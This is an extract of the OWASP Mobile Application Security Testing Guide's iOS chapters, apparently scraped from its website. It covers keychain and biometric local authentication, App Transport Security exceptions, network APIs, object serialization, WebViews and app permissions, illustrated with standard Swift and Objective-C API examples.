The KeyChain supports two types of storage mechanisms: a key is either secured by an encryption key stored in the secure enclave or the key itself is within the secure enclave. The latter only holds when you use an ECDH signing key. See the Apple Documentation for more details on its implementation.
The last three options consist of using hardcoded encryption keys in the source code, having a predictable key derivation function based on stable attributes, and storing generated keys in places that are shared with other applications. Using hardcoded encryption keys is obviously not the way to go, as this would mean that every instance of the application uses the same encryption key. An attacker needs only to do the work once in order to extract the key from the source code (whether stored natively or in Objective-C/Swift). Consequently, the attacker can decrypt any other data that was encrypted by the application. Next, when you have a predictable key derivation function based on identifiers which are accessible to other applications, the attacker only needs to find the KDF and apply it to the device in order to find the key. Lastly, storing symmetric encryption keys publicly also is highly discouraged.
Two more notions you should never forget when it comes to cryptography:
Apple provides a Randomization Services API, which generates cryptographically secure random numbers.
The Randomization Services API uses the SecRandomCopyBytes
function to generate numbers. This is a wrapper function for the /dev/random
device file, which provides cryptographically secure pseudorandom values from 0 to 255. Make sure that all random numbers are generated with this API. There is no reason for developers to use a different one.
During local authentication, an app authenticates the user against credentials stored locally on the device. In other words, the user \"unlocks\" the app or some inner layer of functionality by providing a valid PIN, password or biometric characteristics such as face or fingerprint, which is verified by referencing local data. Generally, this is done so that users can more conveniently resume an existing session with a remote service or as a means of step-up authentication to protect some critical function.
As stated before in chapter \"Mobile App Authentication Architectures\": The tester should be aware that local authentication should always be enforced at a remote endpoint or based on a cryptographic primitive. Attackers can easily bypass local authentication if no data returns from the authentication process.
A variety of methods are available for integrating local authentication into apps. The Local Authentication framework provides a set of APIs for developers to extend an authentication dialog to a user. In the context of connecting to a remote service, it is possible (and recommended) to leverage the keychain for implementing local authentication.
Fingerprint authentication on iOS is known as Touch ID. The fingerprint ID sensor is operated by the SecureEnclave security coprocessor and does not expose fingerprint data to any other parts of the system. Next to Touch ID, Apple introduced Face ID: which allows authentication based on facial recognition. Both use similar APIs on an application level; the actual method of storing and retrieving the data (e.g. facial data or fingerprint related data) is different.
Developers have two options for incorporating Touch ID/Face ID authentication:
LocalAuthentication.framework
is a high-level API that can be used to authenticate the user via Touch ID. The app can't access any data associated with the enrolled fingerprint and is notified only whether authentication was successful.Security.framework
is a lower level API to access keychain services. This is a secure option if your app needs to protect some secret data with biometric authentication, since the access control is managed on a system-level and can not easily be bypassed. Security.framework
has a C API, but there are several open source wrappers available, making access to the keychain as simple as to NSUserDefaults. Security.framework
underlies LocalAuthentication.framework
; Apple recommends to default to higher-level APIs whenever possible.Please be aware that using either the LocalAuthentication.framework
or the Security.framework
, will be a control that can be bypassed by an attacker, as it only returns a boolean and no data to proceed with. See Don't touch me that way, by David Lindner et al. for more details.
The Local Authentication framework provides facilities for requesting a passphrase or Touch ID authentication from users. Developers can display and utilize an authentication prompt by utilizing the function evaluatePolicy
of the LAContext
class.
Two available policies define acceptable forms of authentication:
deviceOwnerAuthentication
(Swift) or LAPolicyDeviceOwnerAuthentication
(Objective-C): When available, the user is prompted to perform Touch ID authentication. If Touch ID is not activated, the device passcode is requested instead. If the device passcode is not enabled, policy evaluation fails.
deviceOwnerAuthenticationWithBiometrics
(Swift) or LAPolicyDeviceOwnerAuthenticationWithBiometrics
(Objective-C): Authentication is restricted to biometrics where the user is prompted for Touch ID.
The evaluatePolicy
function returns a boolean value indicating whether the user has authenticated successfully.
The Apple Developer website offers code samples for both Swift and Objective-C. A typical implementation in Swift looks as follows.
let context = LAContext()\nvar error: NSError?\n\nguard context.canEvaluatePolicy(.deviceOwnerAuthentication, error: &error) else {\n // Could not evaluate policy; look at error and present an appropriate message to user\n}\n\ncontext.evaluatePolicy(.deviceOwnerAuthentication, localizedReason: \"Please, pass authorization to enter this area\") { success, evaluationError in\n guard success else {\n // User did not authenticate successfully, look at evaluationError and take appropriate action\n }\n\n // User authenticated successfully, take appropriate action\n}\n
"},{"location":"MASTG/iOS/0x06f-Testing-Local-Authentication/#using-keychain-services-for-local-authentication","title":"Using Keychain Services for Local Authentication","text":"The iOS keychain APIs can (and should) be used to implement local authentication. During this process, the app stores either a secret authentication token or another piece of secret data identifying the user in the keychain. In order to authenticate to a remote service, the user must unlock the keychain using their passphrase or fingerprint to obtain the secret data.
The keychain allows saving items with the special SecAccessControl
attribute, which will allow access to the item from the keychain only after the user has passed Touch ID authentication (or passcode, if such a fallback is allowed by attribute parameters).
In the following example we will save the string \"test_strong_password\" to the keychain. The string can be accessed only on the current device while the passcode is set (kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
parameter) and after Touch ID authentication for the currently enrolled fingers only (SecAccessControlCreateFlags.biometryCurrentSet
parameter):
// 1. Create the AccessControl object that will represent authentication settings\n\nvar error: Unmanaged<CFError>?\n\nguard let accessControl = SecAccessControlCreateWithFlags(kCFAllocatorDefault,\n kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly,\n SecAccessControlCreateFlags.biometryCurrentSet,\n &error) else {\n // failed to create AccessControl object\n\n return\n}\n\n// 2. Create the keychain services query. Pay attention that kSecAttrAccessControl is mutually exclusive with kSecAttrAccessible attribute\n\nvar query: [String: Any] = [:]\n\nquery[kSecClass as String] = kSecClassGenericPassword\nquery[kSecAttrLabel as String] = \"com.me.myapp.password\" as CFString\nquery[kSecAttrAccount as String] = \"OWASP Account\" as CFString\nquery[kSecValueData as String] = \"test_strong_password\".data(using: .utf8)! as CFData\nquery[kSecAttrAccessControl as String] = accessControl\n\n// 3. Save the item\n\nlet status = SecItemAdd(query as CFDictionary, nil)\n\nif status == noErr {\n // successfully saved\n} else {\n // error while saving\n}\n\n// 4. Now we can request the saved item from the keychain. Keychain services will present the authentication dialog to the user and return data or nil depending on whether a suitable fingerprint was provided or not.\n\n// 5. Create the query\nvar query = [String: Any]()\nquery[kSecClass as String] = kSecClassGenericPassword\nquery[kSecReturnData as String] = kCFBooleanTrue\nquery[kSecAttrAccount as String] = \"My Name\" as CFString\nquery[kSecAttrLabel as String] = \"com.me.myapp.password\" as CFString\nquery[kSecUseOperationPrompt as String] = \"Please, pass authorisation to enter this area\" as CFString\n\n// 6. Get the item\nvar queryResult: AnyObject?\nlet status = withUnsafeMutablePointer(to: &queryResult) {\n SecItemCopyMatching(query as CFDictionary, UnsafeMutablePointer($0))\n}\n\nif status == noErr {\n let password = String(data: queryResult as! 
Data, encoding: .utf8)!\n // successfully received password\n} else {\n // authorization not passed\n}\n
"},{"location":"MASTG/iOS/0x06f-Testing-Local-Authentication/#objective-c","title":"Objective-C","text":"// 1. Create the AccessControl object that will represent authentication settings\nCFErrorRef *err = nil;\n\nSecAccessControlRef sacRef = SecAccessControlCreateWithFlags(kCFAllocatorDefault,\n    kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly,\n    kSecAccessControlUserPresence,\n    err);\n\n// 2. Create the keychain services query. Pay attention that kSecAttrAccessControl is mutually exclusive with kSecAttrAccessible attribute\nNSDictionary* query = @{\n    (__bridge id)kSecClass: (__bridge id)kSecClassGenericPassword,\n    (__bridge id)kSecAttrLabel: @\"com.me.myapp.password\",\n    (__bridge id)kSecAttrAccount: @\"OWASP Account\",\n    (__bridge id)kSecValueData: [@\"test_strong_password\" dataUsingEncoding:NSUTF8StringEncoding],\n    (__bridge id)kSecAttrAccessControl: (__bridge_transfer id)sacRef\n};\n\n// 3. Save the item\nOSStatus status = SecItemAdd((__bridge CFDictionaryRef)query, nil);\n\nif (status == noErr) {\n    // successfully saved\n} else {\n    // error while saving\n}\n\n// 4. Now we can request the saved item from the keychain. Keychain services will present the authentication dialog to the user and return data or nil depending on whether a suitable fingerprint was provided or not.\n\n// 5. Create the query\nNSDictionary *query = @{(__bridge id)kSecClass: (__bridge id)kSecClassGenericPassword,\n    (__bridge id)kSecReturnData: @YES,\n    (__bridge id)kSecAttrAccount: @\"My Name1\",\n    (__bridge id)kSecAttrLabel: @\"com.me.myapp.password\",\n    (__bridge id)kSecUseOperationPrompt: @\"Please, pass authorisation to enter this area\" };\n\n// 6. 
Get the item\nCFTypeRef queryResult = NULL;\nOSStatus status = SecItemCopyMatching((__bridge CFDictionaryRef)query, &queryResult);\n\nif (status == noErr){\n NSData* resultData = ( __bridge_transfer NSData* )queryResult;\n NSString* password = [[NSString alloc] initWithData:resultData encoding:NSUTF8StringEncoding];\n NSLog(@\"%@\", password);\n} else {\n NSLog(@\"Something went wrong\");\n}\n
"},{"location":"MASTG/iOS/0x06f-Testing-Local-Authentication/#note-regarding-temporariness-of-keys-in-the-keychain","title":"Note regarding temporariness of keys in the Keychain","text":"Unlike macOS and Android, iOS does not support temporariness of an item's accessibility in the keychain: when there is no additional security check when entering the keychain (e.g. kSecAccessControlUserPresence
or similar is set), then once the device is unlocked, a key will be accessible.
Almost every iOS app acts as a client to one or more remote services. As this network communication usually takes place over untrusted networks such as public Wi-Fi, classical network based-attacks become a potential issue.
Most modern mobile apps use variants of HTTP-based web services, as these protocols are well-documented and supported.
"},{"location":"MASTG/iOS/0x06g-Testing-Network-Communication/#ios-app-transport-security","title":"iOS App Transport Security","text":"Starting with iOS 9, Apple introduced App Transport Security (ATS) which is a set of security checks enforced by the operating system for connections made using the URL Loading System (typically via URLSession
) to always use HTTPS. Apps should follow Apple's best practices to properly secure their connections.
Watch ATS Introductory Video from the Apple WWDC 2015.
ATS performs default server trust evaluation and requires a minimum set of security requirements.
Default Server Trust Evaluation:
When an app connects to a remote server, the server provides its identity using an X.509 digital certificate. The ATS default server trust evaluation includes validating that the certificate:
Minimum Security Requirements for Connections:
ATS will block connections that further fail to meet a set of minimum security requirements including:
Certificate validity checking:
According to Apple, \"evaluating the trusted status of a TLS certificate is performed in accordance with established industry standards, as set out in RFC 5280, and incorporates emerging standards such as RFC 6962 (Certificate Transparency). In iOS 11 or later, Apple devices are periodically updated with a current list of revoked and constrained certificates. The list is aggregated from certificate revocation lists (CRLs), which are published by each of the built-in root certificate authorities trusted by Apple, as well as by their subordinate CA issuers. The list may also include other constraints at Apple\u2019s discretion. This information is consulted whenever a network API function is used to make a secure connection. If there are too many revoked certificates from a CA to list individually, a trust evaluation may instead require that an online certificate status response (OCSP) is needed, and if the response isn\u2019t available, the trust evaluation will fail.\"
"},{"location":"MASTG/iOS/0x06g-Testing-Network-Communication/#when-does-ats-not-apply","title":"When does ATS not apply?","text":"When using lower-level APIs: ATS only applies to the URL Loading System including URLSession and APIs layered on top of them. It does not apply to apps that use lower-level APIs (like BSD Sockets), including those that implement TLS on top of those lower-level APIs (see section \"Using ATS in Apple Frameworks\" from the Archived Apple Developer Documentation).
When connecting to IP addresses, unqualified domain names or local hosts: ATS applies only to connections made to public host names (see section \"Availability of ATS for Remote and Local Connections\" from the Archived Apple Developer Documentation). The system does not provide ATS protection to connections made to:
When including ATS Exceptions: If the app uses the ATS compatible APIs, it can still disable ATS for specific scenarios using ATS Exceptions.
Learn more:
ATS restrictions can be disabled by configuring exceptions in the Info.plist
file under the NSAppTransportSecurity
key. These exceptions can be applied to:
ATS exceptions can be applied globally or per domain basis. The application can globally disable ATS, but opt in for individual domains. The following listing from Apple Developer documentation shows the structure of the NSAppTransportSecurity
dictionary.
NSAppTransportSecurity : Dictionary {\n NSAllowsArbitraryLoads : Boolean\n NSAllowsArbitraryLoadsForMedia : Boolean\n NSAllowsArbitraryLoadsInWebContent : Boolean\n NSAllowsLocalNetworking : Boolean\n NSExceptionDomains : Dictionary {\n <domain-name-string> : Dictionary {\n NSIncludesSubdomains : Boolean\n NSExceptionAllowsInsecureHTTPLoads : Boolean\n NSExceptionMinimumTLSVersion : String\n NSExceptionRequiresForwardSecrecy : Boolean // Default value is YES\n NSRequiresCertificateTransparency : Boolean\n }\n }\n}\n
Source: Apple Developer Documentation.
The following table summarizes the global ATS exceptions. For more information about these exceptions, please refer to table 2 in the official Apple developer documentation.
Key DescriptionNSAllowsArbitraryLoads
Disable ATS restrictions globally except for individual domains specified under NSExceptionDomains
NSAllowsArbitraryLoadsInWebContent
Disable ATS restrictions for all the connections made from web views NSAllowsLocalNetworking
Allow connection to unqualified domain names and .local domains NSAllowsArbitraryLoadsForMedia
Disable all ATS restrictions for media loaded through the AV Foundations framework The following table summarizes the per-domain ATS exceptions. For more information about these exceptions, please refer to table 3 in the official Apple developer documentation.
Key DescriptionNSIncludesSubdomains
Indicates whether ATS exceptions should apply to subdomains of the named domain NSExceptionAllowsInsecureHTTPLoads
Allows HTTP connections to the named domain, but does not affect TLS requirements NSExceptionMinimumTLSVersion
Allows connections to servers with TLS versions less than 1.2 NSExceptionRequiresForwardSecrecy
Disable perfect forward secrecy (PFS) Justifying Exceptions:
Starting from January 1, 2017, Apple App Store review requires justification if one of the following ATS exceptions is defined.
NSAllowsArbitraryLoads
NSAllowsArbitraryLoadsForMedia
NSAllowsArbitraryLoadsInWebContent
NSExceptionAllowsInsecureHTTPLoads
NSExceptionMinimumTLSVersion
This must be carefully revised to determine if it's indeed part of the app's intended purpose. Apple warns about exceptions reducing the security of the apps and advises to configure exceptions only when needed and prefer server fixes when faced with an ATS failure.
Example:
In the following example, ATS is globally enabled (there's no global NSAllowsArbitraryLoads
defined) but an exception is explicitly set for the example.com
domain (and its subdomains). Considering that the domain is owned by the application developers and there's a proper justification, this exception would be acceptable, since it maintains all the benefits of ATS for all other domains. However, it would always be preferable to fix the server as indicated above.
<key>NSAppTransportSecurity</key>\n<dict>\n <key>NSExceptionDomains</key>\n <dict>\n <key>example.com</key>\n <dict>\n <key>NSIncludesSubdomains</key>\n <true/>\n <key>NSExceptionMinimumTLSVersion</key>\n <string>TLSv1.2</string>\n <key>NSExceptionAllowsInsecureHTTPLoads</key>\n <true/>\n <key>NSExceptionRequiresForwardSecrecy</key>\n <true/>\n </dict>\n </dict>\n</dict>\n
For more information on ATS exceptions please consult section \"Configure Exceptions Only When Needed; Prefer Server Fixes\" from the article \"Preventing Insecure Network Connections\" in the Apple Developer Documentation and the blog post on ATS.
"},{"location":"MASTG/iOS/0x06g-Testing-Network-Communication/#server-trust-evaluation","title":"Server Trust Evaluation","text":"ATS imposes extended security checks that supplement the default server trust evaluation prescribed by the Transport Layer Security (TLS) protocol. Loosening ATS restrictions reduces the security of the app. Apps should prefer alternative ways to improve server security before adding ATS exceptions.
The Apple Developer Documentation explains that an app can use URLSession
to automatically handle server trust evaluation. However, apps are also able to customize that process, for example they can:
References:
Since iOS 12.0 the Network framework and the URLSession
class provide methods to load network and URL requests asynchronously and synchronously. Older iOS versions can utilize the Sockets API.
The Network
framework was introduced at The Apple Worldwide Developers Conference (WWDC) in 2018 and is a replacement to the Sockets API. This low-level networking framework provides classes to send and receive data with built in dynamic networking, security and performance support.
TLS 1.3 is enabled by default in the Network
framework, if the argument using: .tls
is used. It is the preferred option over the legacy Secure Transport framework.
URLSession
was built upon the Network
framework and utilizes the same transport services. The class also uses TLS 1.3 by default, if the endpoint is HTTPS.
URLSession
should be used for HTTP and HTTPS connections, instead of utilizing the Network
framework directly. The URLSession
class natively supports both URL schemes and is optimized for such connections. It requires less boilerplate code, reducing the possibility for errors and ensuring secure connections by default. The Network
framework should only be used when there are low-level and/or advanced networking requirements.
The official Apple documentation includes examples of using the Network
framework to implement netcat and URLSession
to fetch website data into memory.
Enforced updating can be helpful when it comes to public key pinning (see the Testing Network communication for more details) when a pin has to be refreshed due to a certificate/public key rotation. Additionally, vulnerabilities are easily patched by means of forced updates.
The challenge with iOS however, is that Apple does not provide any APIs yet to automate this process, instead, developers will have to create their own mechanism, such as described at various blogs which boil down to looking up properties of the app using http://itunes.apple.com/lookup\\?id\\<BundleId>
or third party libraries, such as Siren and react-native-appstore-version-checker. Most of these implementations will require a certain given version offered by an API or just \"latest in the appstore\", which means users can be frustrated with having to update the app, even though no business/security need for an update is truly there.
Please note that newer versions of an application will not fix security issues that are living in the backends to which the app communicates. Allowing an app not to communicate with it might not be enough. Having proper API-lifecycle management is key here. Similarly, when a user is not forced to update, do not forget to test older versions of your app against your API and/or use proper API versioning.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence","title":"Object Persistence","text":"There are several ways to persist an object on iOS:
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-encoding","title":"Object Encoding","text":"iOS comes with two protocols for object encoding and decoding for Objective-C or NSObject
s: NSCoding
and NSSecureCoding
. When a class conforms to either of the protocols, the data is serialized to NSData
: a wrapper for byte buffers. Note that Data
in Swift is the same as NSData
or its mutable counterpart: NSMutableData
. The NSCoding
protocol declares the two methods that must be implemented in order to encode/decode its instance-variables. A class using NSCoding
needs to implement NSObject
or be annotated as an @objc class. The NSCoding
protocol requires to implement encode and init as shown below.
class CustomPoint: NSObject, NSCoding {\n\n //required by NSCoding:\n func encode(with aCoder: NSCoder) {\n aCoder.encode(x, forKey: \"x\")\n aCoder.encode(name, forKey: \"name\")\n }\n\n var x: Double = 0.0\n var name: String = \"\"\n\n init(x: Double, name: String) {\n self.x = x\n self.name = name\n }\n\n // required by NSCoding: initialize members using a decoder.\n required convenience init?(coder aDecoder: NSCoder) {\n guard let name = aDecoder.decodeObject(forKey: \"name\") as? String\n else {return nil}\n self.init(x:aDecoder.decodeDouble(forKey:\"x\"),\n name:name)\n }\n\n //getters/setters/etc.\n}\n
The issue with NSCoding
is that the object is often already constructed and inserted before you can evaluate the class-type. This allows an attacker to easily inject all sorts of data. Therefore, the NSSecureCoding
protocol has been introduced. When conforming to NSSecureCoding
you need to include:
static var supportsSecureCoding: Bool {\n return true\n}\n
when init(coder:)
is part of the class. Next, when decoding the object, a check should be made, e.g.:
let obj = decoder.decodeObject(of:MyClass.self, forKey: \"myKey\")\n
The conformance to NSSecureCoding
ensures that objects being instantiated are indeed the ones that were expected. However, there are no additional integrity checks done over the data and the data is not encrypted. Therefore, any secret data needs additional encryption and data of which the integrity must be protected, should get an additional HMAC.
Note, when NSData
(Objective-C) or the keyword let
(Swift) is used: then the data is immutable in memory and cannot be easily removed.
NSKeyedArchiver
is a concrete subclass of NSCoder
and provides a way to encode objects and store them in a file. The NSKeyedUnarchiver
decodes the data and recreates the original data. Let's take the example of the NSCoding
section and now archive and unarchive them:
// archiving:\nNSKeyedArchiver.archiveRootObject(customPoint, toFile: \"/path/to/archive\")\n\n// unarchiving:\nguard let customPoint = NSKeyedUnarchiver.unarchiveObjectWithFile(\"/path/to/archive\") as?\n CustomPoint else { return nil }\n
When decoding a keyed archive, because values are requested by name, values can be decoded out of sequence or not at all. Keyed archives, therefore, provide better support for forward and backward compatibility. This means that an archive on disk could actually contain additional data which is not detected by the program, unless the key for that given data is provided at a later stage.
Note that additional protection needs to be in place to secure the file in case of confidential data, as the data is not encrypted within the file. See the chapter \"Data Storage on iOS\" for more details.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#codable","title":"Codable","text":"With Swift 4, the Codable
type alias arrived: it is a combination of the Decodable
and Encodable
protocols. A String
, Int
, Double
, Date
, Data
and URL
are Codable
by nature: meaning they can easily be encoded and decoded without any additional work. Let's take the following example:
struct CustomPointStruct:Codable {\n var x: Double\n var name: String\n}\n
By adding Codable
to the inheritance list for the CustomPointStruct
in the example, the methods init(from:)
and encode(to:)
are automatically supported. Fore more details about the workings of Codable
check the Apple Developer Documentation. The Codable
s can easily be encoded / decoded into various representations: NSData
using NSCoding
/NSSecureCoding
, JSON, Property Lists, XML, etc. See the subsections below for more details.
There are various ways to encode and decode JSON within iOS by using different 3rd party libraries:
The libraries differ in their support for certain versions of Swift and Objective-C, whether they return (im)mutable results, speed, memory consumption and actual library size. Again, note in case of immutability: confidential information cannot be removed from memory easily.
Next, Apple provides support for JSON encoding/decoding directly by combining Codable
together with a JSONEncoder
and a JSONDecoder
:
struct CustomPointStruct: Codable {\n var point: Double\n var name: String\n}\n\nlet encoder = JSONEncoder()\nencoder.outputFormatting = .prettyPrinted\n\nlet test = CustomPointStruct(point: 10, name: \"test\")\nlet data = try encoder.encode(test)\nlet stringData = String(data: data, encoding: .utf8)\n\n// stringData = Optional ({\n// \"point\" : 10,\n// \"name\" : \"test\"\n// })\n
JSON itself can be stored anywhere, e.g., a (NoSQL) database or a file. You just need to make sure that any JSON that contains secrets has been appropriately protected (e.g., encrypted/HMACed). See the chapter \"Data Storage on iOS\" for more details.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#property-lists-and-codable","title":"Property Lists and Codable","text":"You can persist objects to property lists (also called plists in previous sections). You can find two examples below of how to use it:
// archiving:\nlet data = NSKeyedArchiver.archivedDataWithRootObject(customPoint)\nNSUserDefaults.standardUserDefaults().setObject(data, forKey: \"customPoint\")\n\n// unarchiving:\n\nif let data = NSUserDefaults.standardUserDefaults().objectForKey(\"customPoint\") as? NSData {\n let customPoint = NSKeyedUnarchiver.unarchiveObjectWithData(data)\n}\n
In this first example, the NSUserDefaults
are used, which is the primary property list. We can do the same with the Codable
version:
struct CustomPointStruct: Codable {\n var point: Double\n var name: String\n }\n\n var points: [CustomPointStruct] = [\n CustomPointStruct(point: 1, name: \"test\"),\n CustomPointStruct(point: 2, name: \"test\"),\n CustomPointStruct(point: 3, name: \"test\"),\n ]\n\n UserDefaults.standard.set(try? PropertyListEncoder().encode(points), forKey: \"points\")\n if let data = UserDefaults.standard.value(forKey: \"points\") as? Data {\n let points2 = try? PropertyListDecoder().decode([CustomPointStruct].self, from: data)\n }\n
Note that plist
files are not meant to store secret information. They are designed to hold user preferences for an app.
There are multiple ways to do XML encoding. Similar to JSON parsing, there are various third party libraries, such as:
They vary in terms of speed, memory usage, object persistence and more important: differ in how they handle XML external entities. See XXE in the Apple iOS Office viewer as an example. Therefore, it is key to disable external entity parsing if possible. See the OWASP XXE prevention cheatsheet for more details. Next to the libraries, you can make use of Apple's XMLParser
class.
When not using third party libraries, but Apple's XMLParser
, be sure to let shouldResolveExternalEntities
return false
.
There are various ORM-like solutions for iOS. The first one is Realm, which comes with its own storage engine. Realm has settings to encrypt the data as explained in Realm's documentation. This allows for handling secure data. Note that the encryption is turned off by default.
Apple itself supplies CoreData
, which is well explained in the Apple Developer Documentation. It supports various storage backends as described in Apple's Persistent Store Types and Behaviors documentation. The issue with the storage backends recommended by Apple is that none of the data store types are encrypted or checked for integrity. Therefore, additional actions are necessary in case of confidential data. An alternative can be found in project iMas, which does supply out of the box encryption.
Protocol Buffers by Google, are a platform- and language-neutral mechanism for serializing structured data by means of the Binary Data Format. They are available for iOS by means of the Protobuf library. There have been a few vulnerabilities with Protocol Buffers, such as CVE-2015-5237. Note that Protocol Buffers do not provide any protection for confidentiality as no built-in encryption is available.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#webviews","title":"WebViews","text":"WebViews are in-app browser components for displaying interactive web content. They can be used to embed web content directly into an app's user interface. iOS WebViews support JavaScript execution by default, so script injection and Cross-Site Scripting attacks can affect them.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#types-of-webviews","title":"Types of WebViews","text":"There are multiple ways to include a WebView in an iOS application:
UIWebView
WKWebView
SFSafariViewController
UIWebView
is deprecated starting on iOS 12 and should not be used. Make sure that either WKWebView
or SFSafariViewController
are used to embed web content. In addition to that, JavaScript cannot be disabled for UIWebView
which is another reason to refrain from using it.
WKWebView
was introduced with iOS 8 and is the appropriate choice for extending app functionality, controlling displayed content (i.e., prevent the user from navigating to arbitrary URLs) and customizing.
WKWebView
comes with several security advantages over UIWebView
:
javaScriptEnabled
property of WKWebView
, it can be completely disabled, preventing all script injection flaws.JavaScriptCanOpenWindowsAutomatically
can be used to prevent JavaScript from opening new windows, such as pop-ups.hasOnlySecureContent
property can be used to verify resources loaded by the WebView are retrieved through encrypted connections.WKWebView
implements out-of-process rendering, so memory corruption bugs won't affect the main app process.A JavaScript Bridge can be enabled when using WKWebView
and UIWebView
. See Section \"Native Functionality Exposed Through WebViews\" below for more information.
SFSafariViewController
is available starting on iOS 9 and should be used to provide a generalized web viewing experience. These WebViews can be easily spotted as they have a characteristic layout which includes the following elements:
There are a couple of things to consider:
SFSafariViewController
and this is one of the reasons why the usage of WKWebView
is recommended when the goal is extending the app's user interface.SFSafariViewController
also shares cookies and other website data with Safari.SFSafariViewController
are not visible to the app, which cannot access AutoFill data, browsing history, or website data.SFSafariViewController
s may not be hidden or obscured by other views or layers.This should be sufficient for an app analysis and therefore, SFSafariViewController
s are out of scope for the Static and Dynamic Analysis sections.
Enabling Safari web inspection on iOS allows you to inspect the contents of a WebView remotely from a macOS device. By default, you can view the contents of any page loaded into the Safari app because the Safari app has the get-task-allowed
entitlement. Applications installed from the App store will however not have this entitlement, and so cannot be attached to. On jailbroken devices, this entitlement can be added to any application by installing the Inspectorplus tweak from the BigBoss repo.
Enabling the Safari Web Inspector is especially interesting in applications that expose native APIs using a JavaScript bridge, for example in hybrid applications.
To activate the web inspection you have to follow these steps:
To open the web inspector and debug a WebView:
Now you're able to debug the WebView as you would with a regular web page on your desktop browser.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#native-functionality-exposed-through-webviews","title":"Native Functionality Exposed Through WebViews","text":"In iOS 7, Apple introduced APIs that allow communication between the JavaScript runtime in the WebView and the native Swift or Objective-C objects. If these APIs are used carelessly, important functionality might be exposed to attackers who manage to inject malicious scripts into the WebView (e.g., through a successful Cross-Site Scripting attack).
Both UIWebView
and WKWebView
provide a means of communication between the WebView and the native app. Any important data or native functionality exposed to the WebView JavaScript engine would also be accessible to rogue JavaScript running in the WebView.
UIWebView:
There are two fundamental ways of how native code and JavaScript can communicate:
JSContext
, JavaScriptCore automatically wraps the block in a JavaScript function.JSExport
-inherited protocol are mapped to JavaScript objects that are available to all JavaScript code. Modifications of objects that are in the JavaScript environment are reflected in the native environment.Note that only class members defined in the JSExport
protocol are made accessible to JavaScript code.
WKWebView:
JavaScript code in a WKWebView
can still send messages back to the native app but in contrast to UIWebView
, it is not possible to directly reference the JSContext
of a WKWebView
. Instead, communication is implemented using a messaging system and using the postMessage
function, which automatically serializes JavaScript objects into native Objective-C or Swift objects. Message handlers are configured using the method add(_ scriptMessageHandler:name:)
.
In contrast to Android, where each app runs on its own user ID, iOS makes all third-party apps run under the non-privileged mobile
user. Each app has a unique home directory and is sandboxed, so that they cannot access protected system resources or files stored by the system or by other apps. These restrictions are implemented via sandbox policies (aka. profiles), which are enforced by the Trusted BSD (MAC) Mandatory Access Control Framework via a kernel extension. iOS applies a generic sandbox profile to all third-party apps called container. Access to protected resources or data (some also known as app capabilities) is possible, but it's strictly controlled via special permissions known as entitlements.
Some permissions can be configured by the app's developers (e.g. Data Protection or Keychain Sharing) and will directly take effect after the installation. However, for others, the user will be explicitly asked the first time the app attempts to access a protected resource, for example:
Even though Apple urges to protect the privacy of the user and to be very clear on how to ask permissions, it can still be the case that an app requests too many of them for non-obvious reasons.
Verifying the use of some permissions such as Camera, Photos, Calendar Data, Motion, Contacts or Speech Recognition should be pretty straightforward as it should be obvious if the app requires them to fulfill its tasks. Let's consider the following examples regarding the Photos permission, which, if granted, gives the app access to all user photos in the \"Camera Roll\" (the iOS default system-wide location for storing photos):
UIImagePickerController
(iOS 11+) and its modern replacement PHPickerViewController
(iOS 14+). These APIs run on a separate process from your app and by using them, the app gets read-only access exclusively to the images selected by the user instead of to the whole \"Camera Roll\". This is considered a best practice to avoid requesting unnecessary permissions.Verifying other permissions like Bluetooth or Location require a deeper source code inspection. They may be required for the app to properly function but the data being handled by those tasks might not be properly protected.
When collecting or simply handling (e.g. caching) sensitive data, an app should provide proper mechanisms to give the user control over it, e.g. to be able to revoke access or to delete it. However, sensitive data might not only be stored or cached but also sent over the network. In both cases, it has to be ensured that the app properly follows the appropriate best practices, which in this case involve implementing proper data protection and transport security. More information on how to protect this kind of data can be found in the chapter \"Network APIs\".
As you can see, using app capabilities and permissions mostly involve handling personal data, therefore being a matter of protecting the user's privacy. See the articles \"Protecting the User's Privacy\" and \"Accessing Protected Resources\" in Apple Developer Documentation for more details.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#device-capabilities","title":"Device Capabilities","text":"Device capabilities are used by the App Store to ensure that only compatible devices are listed and therefore are allowed to download the app. They are specified in the Info.plist
file of the app under the UIRequiredDeviceCapabilities
key.
<key>UIRequiredDeviceCapabilities</key>\n<array>\n <string>arm64</string>\n</array>\n
Typically you'll find the arm64
capability, meaning that the app is compiled for the arm64 instruction set.
For example, an app might be completely dependent on NFC to work (e.g. a \"NFC Tag Reader\" app). According to the archived iOS Device Compatibility Reference, NFC is only available starting on the iPhone 7 (and iOS 11). A developer might want to exclude all incompatible devices by setting the nfc
device capability.
Regarding testing, you can consider UIRequiredDeviceCapabilities
as a mere indication that the app is using some specific resources. Unlike the entitlements related to app capabilities, device capabilities do not confer any right or access to protected resources. Additional configuration steps might be required for that, which are very specific to each capability.
For example, if BLE is a core feature of the app, Apple's Core Bluetooth Programming Guide explains the different things to be considered:
bluetooth-le
device capability can be set in order to restrict non-BLE capable devices from downloading their app.bluetooth-peripheral
or bluetooth-central
(both UIBackgroundModes
) should be added if BLE background processing is required.However, this is not yet enough for the app to get access to the Bluetooth peripheral, the NSBluetoothPeripheralUsageDescription
key has to be included in the Info.plist
file, meaning that the user has to actively give permission. See \"Purpose Strings in the Info.plist File\" below for more information.
According to Apple's iOS Security Guide:
Entitlements are key value pairs that are signed in to an app and allow authentication beyond runtime factors, like UNIX user ID. Since entitlements are digitally signed, they can\u2019t be changed. Entitlements are used extensively by system apps and daemons to perform specific privileged operations that would otherwise require the process to run as root. This greatly reduces the potential for privilege escalation by a compromised system app or daemon.
Many entitlements can be set using the \"Summary\" tab of the Xcode target editor. Other entitlements require editing a target\u2019s entitlements property list file or are inherited from the iOS provisioning profile used to run the app.
Entitlement Sources:
Entitlement Destinations:
The Apple Developer Documentation also explains:
embedded.mobileprovision
